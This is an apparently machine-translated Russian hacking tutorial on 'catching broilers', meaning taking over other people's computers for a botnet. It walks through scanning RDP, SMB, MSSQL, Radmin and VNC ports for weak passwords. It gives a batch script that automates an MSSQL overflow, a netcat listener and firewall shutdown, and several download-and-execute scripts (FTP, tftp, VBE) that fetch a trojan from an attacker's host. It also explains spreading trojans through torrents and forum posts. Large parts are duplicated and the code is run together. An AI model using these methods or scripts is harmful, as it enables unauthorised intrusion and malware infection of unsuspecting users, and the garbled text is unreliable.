В одном столбце укажите только порт 1433. Затем вы можете начать сканирование. После завершения сканирования вы обнаружите порт Несколько способов ловли цыплят-бройлеров Что такое бройлер, должен знать каждый! Хаха, само собой разумеется....... Учитесь медленно
1. 3389 поймать курицу
Сейчас во внутреннем Интернете циркулирует клонированная версия XP. После установки по умолчанию будет открыта учетная запись с новой учетной записью и пустым паролем, и 3389 по сути будет включен. Мы можем использовать это для ловли цыплят. Сначала используйте инструмент сканирования портов для сканирования порта 3389 сегмента IP. После сканирования напрямую используйте удаленный рабочий стол для подключения к машине с открытым портом 3389 (вы также можете сохранить результат в виде текстового файла и использовать инструмент для сканирования). пакетная генерация 3389 подключений для подключения), а затем введите новую учетную запись. Войдите в систему. Если перед компьютерами других людей никого нет, вы можете перейти в свое пространство, чтобы загрузить и установить загруженного вами троянского коня ~~
Этот метод предназначен только для систем XP. Если вы столкнулись с системами 2000 или 2003 года, не пытайтесь его использовать.
хе-хе. Недостатки также очевидны. Если кто-то еще войдет в XP без новой учетной записи, вы выдавите его, если войдете снова (XP поддерживает только однопользовательский вход, и пользователям необходимо использовать инструменты для входа), или если перед компьютером кто-то есть, вы не сможете войти в систему. Зайдите и откройте IE, чтобы скачать трояна.
2. Сканируйте порт 135, чтобы поймать бройлеров.
Сначала используйте сканер портов для сканирования порта 135 сегмента IP, затем сохраните результат, затем используйте NTSCAN для фильтрации машин со слабыми паролями и, наконец, используйте Recton для открытия telnet для передачи лошади. Поскольку порты 135 и 445 теперь заблокированы брандмауэром, вы можете сканировать только локальный бройлер 135. Если вы хотите перехватывать порты из других мест, вы можете использовать для сканирования только чужой бройлер 135. (детальная анимация
Вы можете зайти на хакерский сайт и поискать 135)
3. Сканируйте порт 445, чтобы поймать бройлеров.
Это похоже на сканирование 135 для ловли цыплят. Сначала используйте сканер портов для сканирования порта 445 определенного IP-адреса, затем сохраните результаты, затем используйте NTSCAN для фильтрации компьютеров со слабыми паролями и, наконец, используйте набор инструментов AhD, чтобы открыть файл. лошадь с общей трансмиссией. Поскольку порты 135 и 445 теперь заблокированы брандмауэром, вы можете сканировать только локальный бройлер 445. Если вы хотите перехватывать порты из других мест, вы можете использовать для сканирования только чужой бройлер 445. (Детальную анимацию можно найти по запросу 445 на хакерском сайте)
4. Перелив партии порта 1433 для ловли бройлеров.
Этот метод позволяет реализовать полностью автоматическую ловлю цыплят, но сейчас этим занимается слишком много людей, и вероятность успеха уже не высока. Используемые инструменты: S scan Пакетный файл sqlhello.exenc.exe. Сначала напишите пакетный процесс, откройте Блокнот, скопируйте и измените следующий код и сохраните его как файл scan+overflow.bat.
@echooff
for/f"eol=;tokens=1,2delims="%%iin(tt.txt)dos.exetcp%%i%%j
14331000/save
@echooff
for/f"eol=;tokens=1delims="%%iin(Result.txt)dosqlhello%%i
1433xxx.xxx.xx.xx556
Вам также необходимо создать новый файл tt.txt с IP-сегментом, который вы хотите сканировать, в формате:
XXX.XXX.XXX.XXXXXX.XXX.XXX.XXX, посередине есть пробел
1433 — порт для сканирования, 1000 — количество потоков сканирования, dosqlhello%%i
1433xxx.xxx.xx.xx556 XXX — это ваш IP-адрес, 556 — это монитор ЧПУ, стоящий за ним.
Прослушайте порт, а затем напишите пакетный процесс
@echooff
Nc-l-vv-p556>daima.txt
echousername>>daima.txt
echopassword>>daima.txt
echobin>>daima.txt(к2шестнадцатеричные данные передачи)
echogetxxx.exe (имя файла вашего трояна,разместить в корневом каталоге)>>daima.txt
echobye>>daima.txt
netstopsharedaccess (отключить встроенный брандмауэр WINDOWS)
ftp-s:daima.txt
xxx.exe (также укажите имя файла вашего трояна)
deldaima.txt
Будьте осторожны и не удалите символ возврата каретки в приведенном выше коде, иначе вы не сможете от него избавиться.
Несколько способов для бройлеров загрузить файлы
tftp-метод
Сначала создайте tftp-сервер на одной из своих машин, например, запустив tftpd32.exe,
Затем загрузите файл (sample.exe) на другую машину (бройлер),
Выполнить в бройлере cmd: tftp-i server ipgetsample.exe
FTP-метод
Выполните в бройлерном cmd:
echoopenftpсерверip[порт]>ftp.txt
echousername>>ftp.txt
echopassword>>ftp.txt
echogetsample.exe>>ftp.txt
echobye>>ftp.txt
ftp-s:ftp.txt
delftp.txt
инструментальный подход
Использование wget.exe от Wineggdrop
Выполните в бройлерном cmd:wgetвеб-сайт/sample.exe
Использование метода dl.vbe
Выполните в бройлерном cmd:
echowithwscript:if.arguments.count^<2then.quit:endif
>dl.vbe
echosetaso=.createobject("adodb.stream"):set
web=createobject("microsoft.xmlhttp")>>dl.vbe
echoweb.open"get",.arguments(0),0:web.send:if
web.status^>200thenquit>>dl.vbe
echo
aso.type=1:aso.open:aso.writeweb.responsebody:aso.savetofile
.arguments(1),2:endwith>dl.vbe
cscriptdl.vbehttp://*。*。*。*:88/sample.exesample.exe
Использование метода iget.vbe
Метод тот же, что и 4,
Выполните в бройлерном cmd:
echoiLocal=LCase(WScript.Arguments(1))>iget.vbe
echoiRemote=LCase(WScript.Arguments(0))>>iget.vbe
echoSetxPost=CreateObject("Microsoft.XMLHTTP")
>>iget.vbe
echoxPost.Open"GET",iRemote,0>>iget.vbe
echoxPost.Send()>>iget.vbe
echoSetsGet=CreateObject("ADODB.Stream")>>iget.vbe
echosGet.Mode=3>>iget.vbe
echosGet.Type=1>>iget.vbe
echosGet.Open()>>iget.vbe
echosGet.Write(xPost.responseBody)>>iget.vbe
echosGet.SaveToFileiLocal,2>>iget.vbe
cscriptiget.vbehttp://*。*。*。*/sample.exesample.exe
Использование метода HTTP-сайта vbe
echoSetxPost=CreateObject("Microsoft.XMLHTTP")
>dsa.vbe
echoxPost.Open"GET","http://*.*.*.*/sample.exe",0
>>dsa.vbe
echoxPost.Send()>>dsa.vbe
echoSetsGet=CreateObject("ADODB.Stream")>>dsa.vbe
echosGet.Mode=3>>dsa.vbe
echosGet.Type=1>>dsa.vbe
echosGet.Open()>>dsa.vbe
echosGet.Write(xPost.responseBody)>>dsa.vbe
echosGet.SaveToFile"sample.exe",2>>dsa.vbecscript
dsa.vbe
deldsa.vbe
3389 Закон
Вы можете открыть 3389, затем войти в систему, чтобы загрузить локально. Этот метод полезен для сервисов
Это особенно эффективно для машин с очень строгими требованиями к загрузке. (Включая аппаратный брандмауэр)
Сначала откройте несколько файлов NC.bat, затем откройте Scan+Overflow.bat, и тогда вы сможете
Идти спать. Автоматическое сканирование, автоматическое переполнение после сканирования и автоматическая загрузка после переполнения.
Конное исполнение, наслаждайтесь! Итак, давайте углубимся в подробности, ха-ха. Еще есть порт 4221
Вы можете переполнить вот так, просто используйте инструмент переполнения этих портов, подробная анимация
Вы можете зайти на хакерский сайт и ввести в поиск 1433.
Забыл упомянуть, что вышеуказанные инструменты и пакетную обработку необходимо разместить в одном файле.
Закрепите его.
Сначала сделайте перерыв, я устал так много печатать.
продолжать
5. Отсканируйте 1433, чтобы поймать цыплят-бройлеров 2.
Используемые инструменты: Сканер портов. Комплексный инструмент использования X-scanSQL.
Как мы уже говорили выше, вероятность успеха переполнения 1433 уже не высока, поэтому я
Мы можем использовать другой метод. На машинах с открытым портом 1433 обычно установлен SQL.
Таким образом, мы можем угадать слабый пароль SQL, чтобы поймать 1433 цыплят.
Сначала используйте сканер портов для сканирования порта 1433 сегмента IP, а затем сохраните результат как
текстовый файл, затем используйте X-scan для импорта этих IP-адресов с открытым 1433, а затем просканируйте
Просто проверьте SQL-SERVER в столбце «Параметры-Глобальные настройки-Модуль сканирования».
, не проверяйте других. Затем перейдите к настройкам плагина, связанным с настройками порта, который необходимо обнаружить.
Существует отчет, в котором перечислены машины со слабыми паролями, а затем открывается инструмент комплексного использования SQL.
Инструмент,Введите слабый пароль, который вы отсканировали, чтобы подключиться,Затем откройтеSQLкомплексное использованиеинструмент-Найдите немногоинструмент СразуOK了порт Несколько способов ловли цыплят-бройлеров Что такое бройлер, должен знать каждый! Хаха, само собой разумеется....... Учитесь медленно
1. 3389 поймать курицу
Сейчас во внутреннем Интернете циркулирует клонированная версия XP. После установки по умолчанию будет открыта учетная запись с новой учетной записью и пустым паролем, и 3389 по сути будет включен. Мы можем использовать это для ловли цыплят. Сначала используйте инструмент сканирования портов для сканирования порта 3389 сегмента IP. После сканирования напрямую используйте удаленный рабочий стол для подключения к машине с открытым портом 3389 (вы также можете сохранить результат в виде текстового файла и использовать инструмент для сканирования). пакетная генерация 3389 подключений для подключения), а затем введите новую учетную запись. Войдите в систему. Если перед компьютерами других людей никого нет, вы можете перейти в свое пространство, чтобы загрузить и установить загруженного вами троянского коня ~~
Этот метод предназначен только для систем XP. Если вы столкнулись с системами 2000 или 2003 года, не пытайтесь его использовать.
хе-хе. Недостатки также очевидны. Если кто-то еще войдет в XP без новой учетной записи, вы выдавите его, если войдете снова (XP поддерживает только однопользовательский вход, и пользователям необходимо использовать инструменты для входа), или если перед компьютером кто-то есть, вы не сможете войти в систему. Зайдите и откройте IE, чтобы скачать трояна.
2. Сканируйте порт 135, чтобы поймать бройлеров.
Сначала используйте сканер портов для сканирования порта 135 сегмента IP, затем сохраните результат, затем используйте NTSCAN для фильтрации машин со слабыми паролями и, наконец, используйте Recton для открытия telnet для передачи лошади. Поскольку порты 135 и 445 теперь заблокированы брандмауэром, вы можете сканировать только локальный бройлер 135. Если вы хотите перехватывать порты из других мест, вы можете использовать для сканирования только чужой бройлер 135. (детальная анимация
Вы можете зайти на хакерский сайт и поискать 135)
3. Сканируйте порт 445, чтобы поймать бройлеров.
Это похоже на сканирование 135 для ловли цыплят. Сначала используйте сканер портов для сканирования порта 445 определенного IP-адреса, затем сохраните результаты, затем используйте NTSCAN для фильтрации компьютеров со слабыми паролями и, наконец, используйте набор инструментов AhD, чтобы открыть файл. лошадь с общей трансмиссией. Поскольку порты 135 и 445 теперь заблокированы брандмауэром, вы можете сканировать только локальный бройлер 445. Если вы хотите перехватывать порты из других мест, вы можете использовать для сканирования только чужой бройлер 445. (Детальную анимацию можно найти по запросу 445 на хакерском сайте)
4. Перелив партии порта 1433 для ловли бройлеров.
Этот метод позволяет реализовать полностью автоматическую ловлю цыплят, но сейчас этим занимается слишком много людей, и вероятность успеха уже не высока. Используемые инструменты: S scan Пакетный файл sqlhello.exenc.exe. Сначала напишите пакетный процесс, откройте Блокнот, скопируйте и измените следующий код и сохраните его как файл scan+overflow.bat.
@echooff
for/f"eol=;tokens=1,2delims="%%iin(tt.txt)dos.exetcp%%i%%j
14331000/save
@echooff
for/f"eol=;tokens=1delims="%%iin(Result.txt)dosqlhello%%i
1433xxx.xxx.xx.xx556
Вам также необходимо создать новый файл tt.txt с IP-сегментом, который вы хотите сканировать, в формате:
XXX.XXX.XXX.XXXXXX.XXX.XXX.XXX, посередине есть пробел
1433 — порт для сканирования, 1000 — количество потоков сканирования, dosqlhello%%i
1433xxx.xxx.xx.xx556 XXX — это ваш IP-адрес, 556 — это монитор ЧПУ, стоящий за ним.
Прослушайте порт, а затем напишите пакетный процесс
@echooff
Nc-l-vv-p556>daima.txt
echousername>>daima.txt
echopassword>>daima.txt
echobin>>daima.txt(к2шестнадцатеричные данные передачи)
echogetxxx.exe (имя файла вашего трояна,разместить в корневом каталоге)>>daima.txt
echobye>>daima.txt
netstopsharedaccess (отключить встроенный брандмауэр WINDOWS)
ftp-s:daima.txt
xxx.exe (также укажите имя файла вашего трояна)
deldaima.txt
Будьте осторожны и не удалите символ возврата каретки в приведенном выше коде, иначе вы не сможете от него избавиться.
Несколько способов для бройлеров загрузить файлы
tftp-метод
Сначала создайте tftp-сервер на одной из своих машин, например, запустив tftpd32.exe,
Затем загрузите файл (sample.exe) на другую машину (бройлер),
Выполнить в бройлере cmd: tftp-i server ipgetsample.exe
FTP-метод
Выполните в бройлерном cmd:
echoopenftpсерверip[порт]>ftp.txt
echousername>>ftp.txt
echopassword>>ftp.txt
echogetsample.exe>>ftp.txt
echobye>>ftp.txt
ftp-s:ftp.txt
delftp.txt
инструментальный подход
Использование wget.exe от Wineggdrop
Выполните в бройлерном cmd:wgetвеб-сайт/sample.exe
Использование метода dl.vbe
Выполните в бройлерном cmd:
echowithwscript:if.arguments.count^<2then.quit:endif
>dl.vbe
echosetaso=.createobject("adodb.stream"):set
web=createobject("microsoft.xmlhttp")>>dl.vbe
echoweb.open"get",.arguments(0),0:web.send:if
web.status^>200thenquit>>dl.vbe
echo
aso.type=1:aso.open:aso.writeweb.responsebody:aso.savetofile
.arguments(1),2:endwith>dl.vbe
cscriptdl.vbehttp://*。*。*。*:88/sample.exesample.exe
Использование метода iget.vbe
Метод тот же, что и 4,
Выполните в бройлерном cmd:
echoiLocal=LCase(WScript.Arguments(1))>iget.vbe
echoiRemote=LCase(WScript.Arguments(0))>>iget.vbe
echoSetxPost=CreateObject("Microsoft.XMLHTTP")
>>iget.vbe
echoxPost.Open"GET",iRemote,0>>iget.vbe
echoxPost.Send()>>iget.vbe
echoSetsGet=CreateObject("ADODB.Stream")>>iget.vbe
echosGet.Mode=3>>iget.vbe
echosGet.Type=1>>iget.vbe
echosGet.Open()>>iget.vbe
echosGet.Write(xPost.responseBody)>>iget.vbe
echosGet.SaveToFileiLocal,2>>iget.vbe
cscriptiget.vbehttp://*。*。*。*/sample.exesample.exe
Использование метода HTTP-сайта vbe
echoSetxPost=CreateObject("Microsoft.XMLHTTP")
>dsa.vbe
echoxPost.Open"GET","http://*.*.*.*/sample.exe",0
>>dsa.vbe
echoxPost.Send()>>dsa.vbe
echoSetsGet=CreateObject("ADODB.Stream")>>dsa.vbe
echosGet.Mode=3>>dsa.vbe
echosGet.Type=1>>dsa.vbe
echosGet.Open()>>dsa.vbe
echosGet.Write(xPost.responseBody)>>dsa.vbe
echosGet.SaveToFile"sample.exe",2>>dsa.vbecscript
dsa.vbe
deldsa.vbe
3389 Закон
Вы можете открыть 3389, затем войти в систему, чтобы загрузить локально. Этот метод полезен для сервисов
Это особенно эффективно для машин с очень строгими требованиями к загрузке. (Включая аппаратный брандмауэр)
Сначала откройте несколько файлов NC.bat, затем откройте Scan+Overflow.bat, и тогда вы сможете
Идти спать. Автоматическое сканирование, автоматическое переполнение после сканирования и автоматическая загрузка после переполнения.
Конное исполнение, наслаждайтесь! Итак, давайте углубимся в подробности, ха-ха. Еще есть порт 4221
Вы можете переполнить вот так, просто используйте инструмент переполнения этих портов, подробная анимация
Вы можете зайти на хакерский сайт и ввести в поиск 1433.
Забыл упомянуть, что вышеуказанные инструменты и пакетную обработку необходимо разместить в одном файле.
Закрепите его.
Сначала сделайте перерыв, я устал так много печатать.
продолжать
5. Отсканируйте 1433, чтобы поймать цыплят-бройлеров 2.
Используемые инструменты: Сканер портов. Комплексный инструмент использования X-scanSQL.
Как мы уже говорили выше, вероятность успеха переполнения 1433 уже не высока, поэтому я
Мы можем использовать другой метод. На машинах с открытым портом 1433 обычно установлен SQL.
Таким образом, мы можем угадать слабый пароль SQL, чтобы поймать 1433 цыплят.
Сначала используйте сканер портов для сканирования порта 1433 сегмента IP, а затем сохраните результат как
текстовый файл, затем используйте X-scan для импорта этих IP-адресов с открытым 1433, а затем просканируйте
Просто проверьте SQL-SERVER в столбце «Параметры-Глобальные настройки-Модуль сканирования».
, не проверяйте других. Затем перейдите к настройкам плагина, связанным с настройками порта, который необходимо обнаружить.
Используйте каталог для загрузки трояна, а затем используйте команды DOS для его запуска.
ХОРОШО.
6. Используйте WINNTAutoAttack для сканирования слабых паролей SA для поимки бройлеров.
На самом деле принцип тот же, что и выше, а эффективность не такая высокая, как указано выше, я просто хочу сделать его более эффективным.
Все знают, хаха.
Инструмент: комплексный инструмент использования WINNTAutoAttackSQL.
Открываем WINNTAutoAttack, находим IP и добавляем его, а потом только проверяем настройки
Обнаруживаются только машины с успешными проверками PING, а SQL выводит список SA с пустыми паролями.
учетную запись, а затем начните сканирование. После сканирования используйте комплексный инструмент использования SQL для подключения и загрузки лошади.
Просто выполните.
7. Отсканируйте пустой пароль 4899, чтобы поймать цыплят.
Инструменты: Сканер портов 4899 Детектор Radmin
Сначала используйте сканер портов для сканирования порта 4899 IP-адреса, а затем используйте 4899 для обнаружения
Импортируйте IP-адрес с портом 4899 на сервер, затем отсканируйте пустую команду и, наконец, используйте Radmin для подключения к серверу.
Машина с пустым паролем,Открытое управление файлами,Загруженный вами троян будет работать как ХОРОШО.
Для получения подробных анимаций вы можете зайти на хакерский сайт и ввести в поиск 4899.
8. Сканируйте порт 5900, чтобы поймать бройлера VNC.
Инструменты: Сканер VNC Разъем VNC
Сначала используйте сканер VNC для сканирования сегмента IP. Формат сканирования — vscan.exe (scan.
имя файла устройства) -i219.0.0.0-219.255.255.255 (сканировать IP-сегмент) -p5900-
После завершения сканирования vnc-vv файл будет создан в той же папке, где находится сканер.
Когда этот файл открывается, появляется список IP-адресов. За IP-адресами стоят несколько слов, например:
исправлено,запрещено,уязвимо, подключать можно только слова, которые уязвимы. затем
Просто используйте разъем VNC для подключения, нет необходимости говорить больше, верно? Подробную анимацию можно найти в
Хакерский поиск по сайту VNC
Далее поговорим о подвешивании лошади для ловли бройлера. Есть много методов, таких как подвешивание лошади BT, бесплатно.
Космическая верховая езда, Громовая верховая езда и т. д., некоторые из которых я еще не знаю, хаха. Ниже будут представлены
Покажите мне несколько, которые я умею делать.
1. Подвесная лошадь БТ
Как следует из названия, он предназначен для публикации вашего трояна на веб-сайте BT, чтобы люди могли его загрузить. Конечно, если вы публикуете только простые троянские файлы, эффект определенно будет плохим, и теперь обычные сайты BT не разрешают публиковать EXE-файлы. Итак, нам нужны некоторые скрытые трюки. Мы можем сначала объединить троян с некоторыми фильмами, музыкой и играми с помощью упаковщика, а затем сжать его в файл RAR и опубликовать. Кто узнает, что в RAR есть троян, когда они начнут загрузку? После того, как он потратил много усилий, чтобы загрузить его, открыл и обнаружил, что он в формате EXE, всегда находятся новички, которые не могут не открыть его, потому что не хотят тратить потраченное время, верно ? Особенно при загрузке XXX фильмов, конечно, можно сделать и веб-трояна, а затем вставлять адрес своего веб-трояна в публикуемый файл (не все файлы могут быть такими, я знаю только, что можно вставлять файлы RM и EXE ), Когда кто-то загружает и открывает ваш веб-троян, он также открывает его. Если в его системе нет лазеек, используемых вашим веб-трояном, он попадет в вашу ловушку. Некоторые друзья могут подумать, что если я связываю трояна с другими файлами и сохраняю формат этого файла (например, RM сохранит формат RM после объединения трояна), то у других не возникнет подозрений, не так ли? Ха-ха, если есть такая хорошая вещь, то почему я не сказал выше, что троянский конь и сид-файл BT должны быть объединены и выпущены, чтобы вы не сходили с ума~~ Итак, позвольте мне поговорить об этом здесь , файл, созданный после объединения троянского коня с другими файлами, может быть только в формате EXE, если только у вас нет уязвимости переполнения в формате объединенного вами файла, поэтому сгенерированный формат файла можно сохранить в формате файл, который вы включили. Однако сейчас такие лазейки
Очень мало, большинство из них заполнены. Даже если есть и другие, они могут быть не обнародованы. Если подумать, вы поймете, почему. Здесь я расскажу о недавней уязвимости переполнения RAR. Для всех версий WinRar ниже 3.6, если ваша версия WinRar ниже 3.6, вы получите удар после запуска файла RAR, входящего в комплект Wrangler. Симптомы этого типа трояна следующие: после запуска файла RAR появится диалоговое окно с указанием, поврежден ли он или неправильный, а затем размер файла RAR станет меньше, и уменьшенный размер будет размером трояна. лошадь. Затем снова откройте файл RAR, и все будет в порядке, диалоговое окно с ошибкой не появится. Я хотел бы напомнить вам как можно скорее обновить версию WINRAR и быть осторожными, чтобы не попасть в ловушку.
2. Свободное место для подвешивания лошадей.
По сути, это похоже на BT, который заключается в том, чтобы загрузить готовый троян на свободное место, на которое вы подали заявку, а затем опубликовать несколько заманчивых сообщений на форуме, чтобы другие могли скачать ваш троян. Преимущество в том, что не нужно делать сиды типа BT, которые не только требуют включения компьютера, но и влияют на скорость сети. Вот как я вешаю трубку в эти дни, получаю свободное место, загружаю трояна и публикую сообщение на двух XXX форумах.